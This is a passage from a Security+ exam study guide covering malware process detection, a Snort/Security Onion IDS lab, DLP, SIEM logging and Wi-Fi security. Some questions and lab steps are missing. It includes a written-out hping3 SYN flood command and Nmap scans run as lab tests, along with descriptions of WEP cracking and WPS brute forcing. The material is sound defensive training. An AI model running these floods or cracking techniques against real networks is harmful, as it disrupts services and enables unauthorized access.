appropriate privileges, either by tricking the user into running it or by exploiting a
vulnerability to execute code without authorization. The malware will then try to
deliver a payload covertly, usually by performing code injection against a valid process.
The advantage of compromising a valid process is that the code runs with the
permissions and identity of the host process, which can allow it to pass through
firewall ACLs.
Note: Study MITRE's Adversarial Tactics, Techniques & Common Knowledge (ATT&CK)
database for more information about malware and other intrusion techniques (https://
attack.mitre.org).
Given the potential exploit techniques, to locate a malicious process you may be
looking for a process name that you do not recognize or for a valid process name that
is not entirely as it should be in other respects:
• Look for unrecognized process names, especially names that mimic a legitimate
system process (scvhost, for instance, instead of svchost) or randomly
generated names. You can use the Search Online function to look up known
processes.
• Look for processes with no icon, version information, description, or company
name and for processes that are unsigned (especially a process with a company
name like Microsoft Corporation that is also unsigned).
Using Process Explorer to observe a startup script (wscript.exe at the bottom of the Process list)
attempting to run an executable with a random image name. (Screenshot used with permission
from Microsoft.)
• Examine processes hosted by the service host executable (svchost.exe) and other
Windows utilities (explorer.exe, notepad.exe, taskmgr.exe, iexplore.exe, and so on).
Look closely at processes that do not have a valid parent/child relationship with the
principal Windows processes.
• When you find a suspect process, examine how it is interacting with the registry, the
file system, and the network.
The Autoruns tool in Sysinternals can be used to identify startup services and
locations. The Process Monitor tools can be used to track how a process interacts with
the file system and registry.
Using Autoruns—The \Windows\CurrentVersion\Run registry key (second from top) is being used to
launch a script with a randomized file name. (Screenshot used with permission from Microsoft.)
Activity 9-4
Discussing Intrusion Detection/
Prevention Systems
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What is the best option for monitoring traffic passing from host-to-host on
the same switch?
The only option for monitoring intra-switch traffic is to use a mirrored port.
Out-of-band means configuring a link that is not shared with ordinary hosts on
the main enterprise network. This could be established using VLANs or
physically separate cabling and switches. Out-of-band monitoring reduces the
chance of an adversary being able to compromise the intrusion detection
process.
The string identifying the malware. You can use this to reference the malware
on the A-V vendor's site and, hopefully, obtain manual removal and prevention
advice.
7. If a Windows system file fails a file integrity check, should you suspect a
malware infection?
8. If you suspect a process of being used for data exfiltration but the process is
not identified as malware by A-V software, what types of analysis tools will
be most useful?
Use a process monitor to see which files the process interacts with and a
network monitor to see if it opens (or tries to open) a connection with a remote
host.
Activity 9-5
Installing and Configuring an Intrusion
Detection System
SCENARIO
In this activity, you will position an IDS sensor to monitor packets on the LAN router's
Internet-facing interface. You will use the Security Onion Linux distribution (https://
securityonion.net) and its bundled Snort IDS as the sensor. You have to adjust port
mirroring settings in Hyper-V to allow the sensor to receive traffic arriving on the
router's 172.16.0.254 interface.
This activity is designed to test your understanding of and ability to apply content
examples in the following CompTIA Security+ objectives:
• 2.1 Install and configure network components, both hardware- and software-based,
to support organizational security.
• 2.4 Given a scenario, analyze and interpret output from security technologies.
• 3.2 Given a scenario, implement secure network architecture concepts.
1. Attach the SECONION VM to a spanning port on the network's ISP switch so that it
can sniff traffic arriving at and leaving the 172.16.0.254 interface of the RT1-
LOCAL VyOS router VM. Use the mirroring mode feature in Hyper-V to accomplish
this.
Network topology—Remember that the square icons are switches, while round ones are routers.
(Image © 123RF.com.)
a) In the Hyper-V Manager console, right-click the RT1-LOCAL VM and select Settings.
b) Select the eth1 node (attached to the vISP switch), then expand to select its
Advanced Features node.
Configure the adapter attached to the ISP switch as a source port. (Screenshot used with
permission from Microsoft.)
d) In Hyper-V Manager, right-click the SECONION VM and select Settings.
e) Select the eth0 node (attached to the vISP switch) then expand to select its Advanced
Features node.
f) From the Mirroring mode box, select Destination. Select OK.
2. Sign on to the SECONION VM and run the SGUIL tool, which is used to monitor
incidents in real-time.
a) Open a connection window for the SECONION VM. Log on with the username
administrator and password Pa$$w0rd
Security Onion—Launching the SGUIL app. (Screenshot used with permission from Security
Onion.)
b) Select the Sguil icon on the desktop and log on with the credentials administrator/Pa
$$w0rd
c) Check the seconion-eth0 interface check box then select Start SGUIL.
Make sure only seconion-eth0 is checked.
d) Open a connection window for the KALI VM and log on with the credentials root/Pa$
$w0rd
e) Open a terminal and run ping 10.1.0.1
f) Once you have transmitted a few probes, press Ctrl+C to halt and switch to the
SECONION VM.
g) The probes will be shown as a record in the console. Select the record.
h) In the panel in the bottom-right, check the Show Packet Data and Show Rule check
boxes to show the packet contents and the rule that produced a signature match for
this event. Record the rule SID. __________________
Note: To resize the panes, you need to click-and-drag on the little boxes,
rather than the frame borders.
b) Right-click the value in the Alert ID field and view the menu options without selecting
anything. These allow you to pivot to viewing the source data in a tool such as
Wireshark, Network Miner, or Bro.
SGUIL IDS event viewer in the Security Onion distro—You can pivot from an alert to view
the packets in tools such as Wireshark or Network Miner. (Screenshot used with permission
from Security Onion.)
c) Right-click the value in the Src IP field and view the menu options. These allow you to
pivot to the information already stored about that value elsewhere in the database.
You can get similar options for ports and event messages.
d) Right-click the value in the ST field. Select Update Event Status→Cat VI:
Reconnaissance/Probes/Scans.
This dismisses the event from SGUIL. The event is still recorded in the database.
e) Open a connection window for the RT1-LOCAL VM and log on with the credentials
vyos/Pa$$w0rd
f) In the terminal, run ping 10.1.0.1
g) Once you have transmitted a few probes, press Ctrl+C to halt and switch to the
SECONION VM.
These probes are not transmitted over the ISP switch so are not captured by the
sensor. On a corporate network, you might place sensors at multiple locations and
consolidate the feeds from each of them in a Security Information and Event
Management (SIEM) console.
4. When rules generate events that you decide you do not need to inspect manually,
you have several choices:
• You can configure SGUIL to autocategorize the event.
• You can tune the ruleset to remove the rule.
• You can apply a threshold to only alert if the rule is matched a certain number of times.
• You can add conditions to trigger (or not trigger) the rule.
To continue this activity, you will choose the option of disabling the rule that alerts on ICMP
matches. To do this you will modify one of the configuration files for the Pulled Pork script,
which is responsible for updating Snort rulesets.
a) In the SECONION VM, right-click the desktop and select Open Terminal Here.
Disabling a rule in the pulled pork Snort IDS update configuration files. (Screenshot used
with permission from Security Onion.)
d) Run sudo rule-update to apply the change.
e) Switch to KALI and run ping again—no alerts should be generated.
f) Use Firefox to open updates.corp.515support.com—again, this should not cause an
alert.
5. Run some intrusive pen tests from KALI and identify the events they generate in
the IDS.
a) In the KALI VM, from the dash, select the Zenmap icon.
b) In the Target dialog box, enter 10.1.0.2 and then select Scan.
c) Switch to SECONION and view the alerts in Sguil. The scan has triggered several
alerts, both for probing sensitive ports (such as the ports for various SQL application
servers) and specifically for Nmap script-based scans.
IDS output from an Nmap scan. (Screenshot used with permission from Security Onion.)
d) Press F6 to categorize each of the events as reconnaissance.
e) In the KALI VM, run the following command in the terminal:
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source
10.1.0.2
Note: Ignore any line breaks in the printed command.
f) Let the DoS attack proceed for a few seconds, then press Ctrl+C to stop it.
g) Observe the rules that the attack has triggered. While the flood is not identified per
se, some of the randomly generated IP addresses are on Spamhaus' Don't Route or
Peer (DROP) netblocks.
Topic D
Install and Configure Data Loss
Prevention (DLP) Systems
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.3 Given a scenario, troubleshoot common security issues.
2.4 Given a scenario, analyze and interpret output from security technologies.
The security control technologies we have looked at so far are designed to protect
network segments and host systems. There are technologies to defend even further in
depth and apply controls directly to data. As a security professional, you need to be
aware of the capabilities of these data loss prevention (DLP) systems and how they can
be used to protect data anywhere it resides, on hosts, in email systems, or in the cloud.
DATA EXFILTRATION
In a workplace where mobile devices with huge storage capacity proliferate and high
bandwidth network links are readily available, attempting to prevent the loss of data by
controlling the types of storage devices allowed to connect to PCs and networks can be
impractical. Unauthorized copying or retrieval of data from a system is referred to as
data exfiltration. Data exfiltration attacks are one of the primary means for attackers
to retrieve valuable data, such as Personally Identifiable Information (PII) or payment
information, often destined for later sale on the black market. Data exfiltration can
take place via a wide variety of mechanisms, including:
• Copying the data to removable media or other device with storage, such as USB
drive, the memory card in a digital camera, or a smartphone.
• Using a network protocol, such as HTTP, FTP, SSH, email, or Instant Messaging (IM)/
chat. A sophisticated adversary might use a Remote Access Trojan (RAT) to perform
transfer of data over a non-standard network port or a packet crafter to transfer
data over a standard port in a non-standard way. The adversary may also use
encryption to disguise the data being exfiltrated.
• By communicating it orally over a telephone, cell phone, or Voice over IP (VoIP)
network. Cell phone text messaging is another possibility.
• Using a picture or video of the data—if text information is converted to an image
format it is very difficult for a computer-based detection system to identify the
original information from the image data.
While some of these mechanisms are simple to mitigate through the use of security
tools, others may be much less easily defeated. You can protect data using
mechanisms and security controls that you have examined previously:
• Ensure that all sensitive data is encrypted at rest. If the data is transferred outside
the network, it will be mostly useless to the attacker without the decryption key.
• Create and maintain offsite backups of data that may be targeted for destruction or
ransom.
• Ensure that systems storing or transmitting sensitive data are implementing access
controls. Check to see if access control mechanisms are granting excessive
privileges to certain accounts.
• Restrict the types of network channels that attackers can use to transfer data from
the network to the outside. Disconnect systems storing archived data from the
network.
• Train users about document confidentiality and the use of encryption to store and
transmit data securely. This should also be backed up by HR and auditing policies
that ensure staff are trustworthy.
Even if you apply these policies and controls diligently, there are still risks to data from
insider threats and Advanced Persistent Threat (APT) malware. Consequently, a class of
security control software has been developed to apply access policies directly to data,
rather than just the host or network on which data is located.
Creating a DLP policy in Office 365. (Screenshot used with permission from Microsoft.)
Cloud-based DLP extends the protection mechanisms to cloud storage services, using
either a proxy to mediate access or the cloud service provider's API to perform
scanning and policy enforcement. As an example, SkyHigh Networks' cloud-based DLP
(https://www.skyhighnetworks.com/cloud-data-loss-prevention) can integrate
with Symantec's on-premises DLP (https://www.symantec.com/products/data-loss-
prevention) to apply the same policies across different infrastructures.
DLP REMEDIATION
Remediation is the action the DLP software takes when it detects a policy violation. The
following remediation mechanisms are typical:
• Alert only—the copying is allowed, but the management system records an incident
and may alert an administrator.
• Block—the user is prevented from copying the original file but retains access to it.
The user may or may not be alerted to the policy violation, but it will be logged as
an incident by the management engine.
• Quarantine—access to the original file is denied to the user (or possibly any user).
This might be accomplished by encrypting the file in place or by moving it to a
quarantine area in the file system.
• Tombstone—the original file is quarantined and replaced with one describing the
policy violation and how the user can release it again.
When it is configured to protect a communications channel such as email, DLP
remediation might take place using client-side or server-side mechanisms. For
example, some DLP solutions prevent the actual attaching of files to the email before it
is sent. Others might scan the email attachments and message contents, and then strip
out certain data or stop the email from reaching its destination.
Configuring a rights management template. (Screenshot used with permission from Microsoft.)
Rights management is built into other secure document solutions, such as Adobe®
Acrobat®.
Activity 9-6
Discussing Data Loss Prevention (DLP)
Systems
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
2. A user reports that an essential design draft document has disappeared and
in its place is a file describing a policy violation. Should you suspect the
reporting user of having attempted to exfiltrate the data?
Not necessarily. The Data Loss Prevention (DLP) solution might have been
configured to quarantine the file for all users if any policy violation was
detected. You should check the DLP monitor alerts or logs.
3. What mechanisms does cloud-based DLP use to prevent data loss from cloud
services?
The solution can either use a proxy to mediate access or the cloud service
provider's API to perform scanning and policy enforcement.
Topic E
Install and Configure Logging and SIEM
Systems
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.3 Given a scenario, troubleshoot common security issues.
3.2 Given a scenario, implement secure network architecture concepts.
As you have seen, there are many types of security controls that can be deployed to
protect networks, hosts, and data. One thing that all these controls have in common is
that they generate log data and alerts. Reviewing this output is one of the principal
challenges in information security management. As a security professional, you must
be able to describe, install, and configure systems to manage logging and events.
Log review is a critical part of security assurance. Only referring to the logs following a
major incident is missing the opportunity to identify threats and vulnerabilities early
and to respond proactively. Software designed to assist with security logging and
alerting is often described as security information and event management (SIEM). The
core function of a SIEM tool is to aggregate logs from multiple sources. In addition to
logs from Windows and Linux-based hosts, this could include switches, routers,
firewalls, IDS sensors, vulnerability scanners, malware scanners, Data Loss Prevention
(DLP) systems, and databases.
The second critical function of SIEM (and the principal factor distinguishing it from
basic log management) is that of correlation. This means that the SIEM software can
link individual events or data points (observables) into a meaningful indicator of risk, or
Indicator of Compromise (IOC). Correlation can then be used to drive an alerting
system. Finally, SIEM can provide a long-term retention function and be used to
demonstrate regulatory compliance.
OSSIM SIEM dashboard—Configurable dashboards provide the high-level status view of network
security metrics. (Screenshot used with permission from AT&T Cybersecurity.)
Enabling a log parser plug-in for a pfSense security appliance so that firewall events can be imported
into the SIEM. (Screenshot used with permission from AT&T Cybersecurity.)
Note: The rulesets for most security detection and analysis systems depend on regular
expression (regex) syntax. The search pattern is built from the regular expression
syntax, which defines several metacharacters that function as search operators or
wildcards. Regex syntax is beyond the scope of this course, but you can use an online
reference such as http://regexr.com to learn it.
The sensors and collectors gathering data can be separate from the main SIEM server
hosting the correlation engine. On enterprise networks, this data is likely to be stored
on a storage area network (SAN), rather than directly on the SIEM server, as local
storage is unlikely to be able to cope with the volume of data that will be collected.
TYPES OF LOGS
All NOS and many software applications log system events automatically. However,
many types of logs may need to be enabled manually. For example, Windows does not
log the use of user account privileges or file access automatically. The following general
types of logs can be identified:
• Event log—records things that occur within an operating system (the System event
log in Windows, for instance) or a software application (Windows' Application log).
These logs are used to diagnose errors and performance problems.
• Audit log—records the use of system privileges, such as creating a user account or
modifying a file. Security logging needs to be configured carefully, as over-logging
can reduce the effectiveness of auditing by obscuring genuinely important events
with thousands of routine notifications and consuming disk resources on the
server.
• Security log—this is another way of describing an audit log. The audit log in
Windows Event Viewer is called the Security log.
• Access log—server applications such as Apache can log each connection or request
for a resource. This log is typically called the access log.
Note: NIST has published a guide to security log management (SP800-92) available at
https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf.
Each log can be assigned a category to indicate its severity. For example, in Windows,
system and application events are defined as informational, warning, or critical, while
audit events are categorized as success or fail. This classification is one way to spot
anomalies within logged events more easily and prioritize incidents for
troubleshooting.
identify and troubleshoot serious logs and events anomalies promptly. All alerting
systems suffer from the problems of false positives and false negatives. False positives
overwhelm resources while false negatives mean that security administrators are
exposed to threats without being aware of them. This means that the rules used to
trigger alerting must be carefully drafted and tuned to avoid either over-alerting or
under-reporting.
Not all security incidents will be revealed by a single event. One of the features of log
analysis and reporting software should be to identify trends. It is difficult to spot a
trend by examining each event in a log file. Instead, you need software to chart the
incidence of particular types of events and show how the number or frequency of
those events changes over time. Examples could include:
• Increasing amounts of malware activity.
• Failure of hosts to obtain security patches.
• Increasing bandwidth usage/reducing performance.
Analyzing trends can help to further tune the alerting ruleset. An alerting ruleset could
be based on identifiers found in single events or on a sequence or pattern of events.
SECURE LOGGING/WORM
For computer logs to be accepted as an audit trail, they must be shown to be tamper-
proof (or tamper-evident). It is particularly important to secure logs against tampering
by rogue administrative accounts as this would be a means for an insider threat to
cover his or her tracks. Log files should be writable only by system processes or by
secure accounts that are separate from other administrative accounts. Log files should
be configured to be "append only" so that existing entries cannot be modified. Another
option is for the log to be written to a remote server over a secure communications
link. Alternatively, log files could be written to Write Once, Read Many (WORM)
media. WORM technology used to mean optical drives, such as CD-R and DVD-R. There
are now magnetic WORM drives and RAID arrays developed for secure logging
solutions by companies such as EMC (http://www.emc-centera.com/more-about-
centera).
LOG MAINTENANCE
If left unmonitored and set to append only, logs can grow to consume a large amount
of disk space. Most logs are set to overwrite older events automatically to forestall this.
The old events can be written to an archive log, but obviously these must be moved to
secure long-term storage to avoid filling up the server's disk. A SIEM will assist log
maintenance with the following functions:
• Time synchronization—logs may be collected from appliances in different
geographic locations and, consequently, may be configured with different time
zones. This can cause problems when correlating events and analyzing logs. A SIEM
may be able to normalize events to the same time zone.
Note: Offsetting the time zone to provide consistent reporting is one thing, but the
appliances across the network must be synchronized to the same time in the first
place. This is usually achieved using a Network Time Protocol (NTP) server.
• Event deduplication—some errors may cause hundreds or thousands of identical
error messages to spawn, temporarily blinding the reporting mechanisms of the
SIEM system. Event deduplication means that this type of event storm is identified
as a single event.
Note: To learn more, watch the related Video on the course website.
Activity 9-7
Discussing Logging and SIEM Systems
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
A SIEM collector parses input (such as log files or packet traces) into a standard
format that can be recorded within the SIEM and interpreted for event
correlation. A sensor collects data from the network media.
That the logs are tamper-proof (or at the very least tamper-evident). This might
be assisted by writing logs to Write Once, Read Many (WORM) media.
A trigger is an event (or pattern of events) that generates an alert. Triggers are
identified by defining rules within the SIEM.
This is likely to generate a large amount of raw data (numerous events), which
will be difficult to analyze.
Summary
In this lesson, you reviewed the systems used to implement secure network access,
including firewalls, proxies, load balancers, IDS/IPS, DLP, and SIEM.
• You should be able to install and configure different types of network and host
firewall and proxy software and appliances.
• You should understand the risks posed by Denial of Service and distributed DoS
attacks on network appliances and servers.
• You should be able to install and configure a load balancer.
• You should make sure you can distinguish types of intrusion detection systems and
understand how to use different detection methods.
• You should be aware that modern malware can evade signature-based detection
and understand how to use advanced detection tools to reveal APTs.
• You should understand the use and basic configuration of DLP systems.
• You should understand how sensors and collectors work with logging/SIEM
systems.
A: Answers will vary, but might include firewalls and proxies to filter network traffic;
load balancers to prevent DoS, DDoS, and DRDoS attacks; IDSs and IPSs to
identify and prevent intrusion attacks; DLP controls to protect data; or SIEM and
logging systems to monitor the status of network devices.
What are the benefits of using a UTM appliance to help protect your network?
LESSON INTRODUCTION
Network access is not just about connecting hosts with cables. Most modern networks must
support wireless access and this type of connectivity has its own security challenges. The use of
mobile devices relates to the concept of physical access generally. The premises in which networks
are installed need to use access control mechanisms and be resilient to man-made and natural
disasters, such as fire or flooding.
LESSON OBJECTIVES
In this lesson, you will:
• Install and configure a wireless infrastructure.
• Install and configure wireless security settings.
• Explain the importance of physical security controls.
Topic A
Install and Configure a Wireless
Infrastructure
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
Wireless networks have quickly become the norm in business today. Most
organizations have both a wired and a wireless network for employees to access while
on the move within their facilities. Understanding the potential threats and
vulnerabilities will allow you to successfully secure the wireless components of an
organization's information systems infrastructure.
The AP is normally attached to the LAN using standard cabling and transmits and
receives network traffic to and from wireless devices. Each client device requires a
wireless adapter compatible with the standard(s) supported by the AP.
Note: Make sure an access point is connected to an appropriate switch on the LAN so
that clients connecting to the AP are subject to the normal access controls for
authentication and authorization and can access address configuration services such as
DHCP and DNS. Connecting an AP to the wrong switch could give clients much wider
access than intended (to the core switch fabric, for instance).
All wireless devices operating on a WLAN must be configured with the same network
name, referred to as the service set identifier (SSID). When multiple access points are
grouped into an extended service set, this is more properly called the extended SSID
(ESSID). This just means that all the APs are configured with the same SSID.
UniFi Wireless Network management console. (Screenshot used with permission from Ubiquiti
Networks.)
LAN. It can also assign clients to separate VLANs. Automated VLAN pooling ensures
that the total number of stations per VLAN is kept within specified limits, reducing
excessive broadcast traffic. Another function of a hardware controller is to supply
power to wired access points, using Power over Ethernet (PoE).
BAND SELECTION
Wi-Fi products work in either the 2.4 GHz band or the 5 GHz band, or both. While band
selection does not have a direct effect on the confidentiality or integrity of the network,
it can affect availability and performance.
• 802.11a—legacy products working in the 5 GHz band only.
• 802.11bg—legacy products working in the 2.4 GHz band only.
• 802.11n—products can be either dual band (supporting both 2.4 GHz and 5 GHz
operation) or 2.4 GHz only. Most access points are dual band but many early
802.11n client adapters were single band only.
• 802.11ac—5 GHz only. Most access points supporting 802.11ac are dual band but
use the 2.4 GHz band for legacy clients (802.11bgn) only. Note that better
performance will be obtained by disabling support for legacy standards (especially
802.11b).
A variety of generic antenna types—From left to right, a vertical rod antenna, a Yagi antenna, a
parabolic/dish antenna, and a parabolic grid antenna. (Image © 123RF.com.)
When considering access point and antenna placement, a device supporting the Wi-
Fi standard should have a maximum indoor range of up to about 30m (100 feet),
though the weaker the signal, the lower the data transfer rate. Radio signals pass
through solid objects, such as ordinary brick or drywall walls, but can be weakened or
blocked by particularly dense or thick material and metal. Interference from a variety
of electromagnetic interference sources can also affect signal reception and strength.
Other radio-based devices can also cause interference as can devices as various as
fluorescent lighting, microwave ovens, cordless phones, and (in an industrial
environment) power motors and heavy machinery. Bluetooth® uses the same
frequency range as 2.4 GHz Wi-Fi but a different modulation technique, so interference
is possible but not common.
Note: Conversely, the signal can also travel much farther than 30m. You might want to
consider reducing signal strength to deter intrusion attempts.
Coverage means that the WLAN delivers acceptable data rates to the supported
number of devices in all the physical locations expected. To maximize coverage and
minimize interference, position the AP as high as possible and set the channels of
other nearby APs to different settings. At least 25 MHz spacing should be allowed
between channels to operate without co-channel interference (CCI). In practice,
therefore, in the 2.4 GHz band no more than three nearby 802.11b/g access points can
have non-overlapping channels. This could be implemented, for example, by selecting
channel 1 for AP1, channel 6 for AP2, and channel 11 for AP3.
802.11n/ac can obtain more bandwidth with the option to use two adjacent 20 MHz
channels as a single 40 MHz channel (channel bonding). Channel bonding is only a
practical option in the 5 GHz band, where there are 23 non-overlapping 20 MHz
channels and 11 40 MHz channels. When using the 5 GHz band for 802.11a or
802.11n/ac, the best option is usually to allow the AP to auto-detect the best channel.
Signal strength is the amount of power used by the radio in an access point or
station. Simply increasing power output is not always reliable. As you increase power,
you also increase the chance of the signal bouncing, causing more interference,
especially if there are multiple APs. Also, the client radio power levels should match
those of the AP or they may be able to receive signals but not transmit back. The
received signal strength indicator (RSSI) shows the strength of the signal from the
transmitter. RSSI is a relative indicator, usually expressed as a percentage of a nominal
"perfect" signal. RSSI can be calculated differently as it is implemented by the chipset
vendor. Survey tools measure signal strength in dBm, which is the ratio of the
measured signal to one milliwatt. When measuring signal strength, dBm will be a
negative value with values closer to zero representing better performance. A value
around -65 dBm represents a good signal while anything over -80 dBm is likely to
suffer packet loss or be dropped. The received signal strength must also exceed the
noise level by a decent margin. Noise is also measured in dBm but here values closer
to zero are less welcome as they represent higher noise levels. For example, if a signal
is -65 dBm and noise is -90 dBm, the Signal to Noise Ratio (SNR) is 25 dB; if noise is -80
dBm, the SNR is 15 dB and the connection will be much, much worse.
Configuring power level on a Wi-Fi adapter. (Screenshot used with permission from Microsoft.)
Power levels are best set to auto-negotiate. You should also be aware of legal
restrictions on power output—these vary from country to country. You may want to
turn the power output on an AP down and ensure strategic AP device placement to
prevent war driving. The main problem with this approach is that it requires careful
configuration to ensure that there is acceptable coverage for legitimate users. You also
expose yourself slightly to "evil twin" attacks, as users may expect to find the network
at a given location and assume that the rogue AP is legitimate.
MAC FILTERING
As with a switch, MAC filtering means specifying which MAC addresses are allowed to
connect to the AP. This can be done by specifying a list of valid MAC addresses, but this
"static" method is difficult to keep up to date and is relatively error-prone. It is also
easy for a wireless sniffer to discover valid MAC addresses and spoof them. Enterprise-
class APs allow you to specify a limit to the number of permitted addresses and
automatically learn a set number of valid MAC addresses.
A more practical option is to put a firewall/IDS behind the AP in order to filter traffic
passing between the wired LAN and WLAN.
Activity 10-1
Discussing Wireless Infrastructures
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
1. What are the security considerations when placing antennas to boost the
range of a wireless network?
Extending the range of the network can increase the opportunity for
eavesdropping or penetration (war driving). However, it is practically impossible
for most organizations to shield a wireless network, so it is best to ensure that
the WLAN uses strong authentication and encryption.
False—band selection can affect availability and performance but does not have
an impact in terms of either confidentiality or integrity.
You need a wireless controller to configure and manage the access points. This
makes each access point more tamper-proof as there is no local administration
interface. Configuration errors should also be easier to identify.
4. You need to configure a wireless bridge between two sites. What type of
wireless network technology will be most useful?
A wireless bridge will benefit from the use of a particular antenna type. A
directional antenna will work better than an omnidirectional one.
Topic B
Install and Configure Wireless Security
Settings
EXAM OBJECTIVES COVERED
1.2 Compare and contrast types of attacks.
2.3 Given a scenario, troubleshoot common security issues.
6.3 Given a scenario, install and configure wireless security settings.
Now, you will focus on the wireless threats and vulnerabilities that can cause damage
to your internal systems. Wireless networks are everywhere, and protecting devices
against wireless vulnerabilities is crucial to protecting sensitive data from unauthorized
access.
• Packets use a checksum to verify integrity, but this is also easy to compute. This
allows the attacker to "bit flip" the ciphertext and observe a corresponding bit in the
plaintext.
The flaws in WEP allow attackers using WEP cracking tools, such as Aircrack-NG
(https://aircrack-ng.org) or AirSnort (https://airsnort.soft112.com), to decrypt and
eavesdrop traffic. These tools work by obtaining many examples of IVs. To crack WEP, a
type of replay attack is used to make the access point generate lots of packets,
usually by replaying ARP packets at it, and cycle through IV values quickly.
WEP is not safe to use. If devices only support WEP, the best alternative is to enhance
the connection security with another security application, such as L2TP/IPSec.
Configuring a TP-LINK SOHO access point with encryption and authentication settings. (Screenshot
used with permission from TP-Link Technologies.)
WPA2 is fully compliant with the 802.11i WLAN security standard. The main difference
to the original iteration of WPA is the use of Advanced Encryption Standard (AES) for
encryption. AES is stronger than RC4/TKIP. AES is deployed within the Counter Mode
with Cipher Block Chaining Message Authentication Code Protocol (CCMP). AES
replaces RC4 and CCMP replaces TKIP. The only reason not to use WPA2 is if it is not
supported by adapters, APs, or operating systems on the network. In many cases,
devices will be compatible with a firmware or driver upgrade.
LICENSED FOR USE ONLY BY: RAMIL · 7543944 · FEB 29 2020
Lesson 10: Installing and Configuring Wireless and Physical Access Security | Topic B
The Official CompTIA® Security+® Student Guide (Exam SY0-501): 2019 Update | 413
Note: WPA2 uses 128-bit AES. The WPA3 standard will mandate 256-bit AES.
WPA and WPA2 are both much more secure than WEP, though a serious vulnerability
was discovered in 2017 (https://www.krackattacks.com) so you should continue to
ensure that device firmware is patched against exploits such as this. Also, when used in
pre-shared key mode, an attacker can obtain the encrypted key by associating with the
access point and then subject the key to brute force or dictionary-based password
attacks. These may succeed if a weak password was used to generate the key. When
enterprise authentication is deployed, there are no known attacks that would enable
an attacker to recover the key.
Note: There are some vulnerabilities in TKIP that can allow an attacker to decrypt
individual packets but only with a low rate of recovery (that is, decrypting each packet
takes minutes).
The main problem is that distribution of the key or passphrase cannot be secured
properly, and users may choose unsecure phrases. It also fails to provide accounting,
as all users share the same key. The advantage is that it is simple to set up. Conversely,
changing the key periodically, as would be good security practice, is difficult.
PSK is the only type of authentication available for WEP and is suitable for SOHO
networks and workgroups using WPA.
Using Cisco's Virtual Wireless LAN Controller to set security policies for a WLAN—this policy enforces
use of WPA2 and the use of 802.1X (Enterprise) authentication. (Screenshot used with permission from
Cisco.)
When using open wireless, users must ensure they send confidential web data only
over HTTPS connections and only use email, VoIP, IM, and file transfer services with
SSL/TLS enabled. Another option is for the user to join a Virtual Private Network
(VPN). The user would associate with the open hotspot then start the VPN connection.
This creates an encrypted "tunnel" between the user's computer and the VPN server.
This allows the user to browse the web or connect to email services without anyone
eavesdropping on the open Wi-Fi network being able to intercept those
communications. The VPN could be provided by the user's company or they could use
a third-party VPN service provider. Of course, if using a third-party, the user needs to
be able to trust them implicitly. The VPN must use certificate-based tunneling to set up
the "inner" authentication method.
Setup (WPS). To use WPS, both the access point and wireless station (client device)
must be WPS-capable. Typically, the devices will have a pushbutton. Activating this on
the access point and the adapter simultaneously will associate the devices using a PIN,
then associate the adapter with the access point using WPA2. The system generates a
random SSID and PSK. If the devices do not support the push-button method, the PIN
(printed on the AP) can be entered manually.
Unfortunately, WPS is vulnerable to a brute force attack. While the PIN is eight
characters, one digit is a checksum and the rest is verified as two separate PINs of four
and three characters. These separate PINs are many orders of magnitude simpler to
brute force, typically requiring just hours to crack. On some models, disabling WPS
through the admin interface does not actually disable the protocol, or there is no
option to disable it. Some APs can lock out an intruder if a brute force attack is
detected, but in some cases the attack can just be resumed when the lockout period
expires. To counter this, the lockout period can be increased. However, this can leave
APs vulnerable to a Denial of Service attack. When provisioning an AP, it is essential to
verify what steps the vendor has taken to make their WPS implementation secure and
the firmware level required to assure security.
EAP-TLS
EAP-TLS is currently considered the strongest type of authentication and is very widely
supported. An encrypted Transport Layer Security (TLS) tunnel is established between
the supplicant and authentication server using public key certificates on the
authentication server and supplicant. As both supplicant and server are configured
with certificates, this provides mutual authentication. The supplicant will typically
provide a certificate using a smart card or a certificate could be installed on the client
PC, possibly in a Trusted Platform Module (TPM).
Configuring Network Policy Server to authenticate wireless clients using 802.1X EAP-TLS. (Screenshot
used with permission from Microsoft.)
EAP-MD5
This is simply a secure hash of a user password. This method cannot provide mutual
authentication (that is, the authenticator cannot authenticate itself to the supplicant).
Therefore, this method is not suitable for use over unsecure networks, as it is
vulnerable to Man-in-the-Middle, session hijacking, and password cracking attacks.
RADIUS FEDERATION
Most implementations of EAP use a RADIUS server to validate the authentication
credentials for each user (supplicant). RADIUS federation means that multiple
organizations allow access to one another's users by joining their RADIUS servers into
a RADIUS hierarchy or mesh. For example, when Bob from widget.com needs to log on
to grommet.com's network, the RADIUS server at grommet.com recognizes that Bob is
not a local user but has been granted access rights and routes the request to
widget.com's RADIUS server.
One example of RADIUS federation is the eduroam network (https://
www.eduroam.org), which allows students of universities from several different
countries to log on to the networks of any of the participating institutions using the
credentials stored by their "home" university.
• Check that clients are configured with the correct passphrase or that access points
can communicate with RADIUS servers and that they are operational and
functioning as expected.
• Ensure that no other wireless signals are interfering with the access point's
transmission.
If scans or network logs show that unauthorized devices are connecting, determine
whether the problem is an access point with misconfigured or weak security or
whether there is some sort of rogue AP. A rogue AP is one that has been installed on
the network without authorization, whether with malicious intent or not. It is vital to
periodically survey the site to detect rogue APs. A malicious user can set up such an
access point with something as basic as a smartphone with tethering capabilities, and
a non-malicious user could enable such an access point by accident. If connected to a
LAN without security, an unauthorized AP creates a very welcoming backdoor through
which to attack the network. A rogue AP could also be used to capture user logon
attempts, allow Man-in-the-Middle attacks, and allow access to private information.
Surveying Wi-Fi networks using Xirrus Wi-Fi Inspector (xirrus.com)—Note the presence of print devices
configured with open authentication (no security) and a smart TV appliance (requiring authentication).
(Screenshot used with permission from Xirrus.)
knows the details of the authentication method. However, the evil twin might be able
to harvest authentication information from users entering their credentials by mistake.
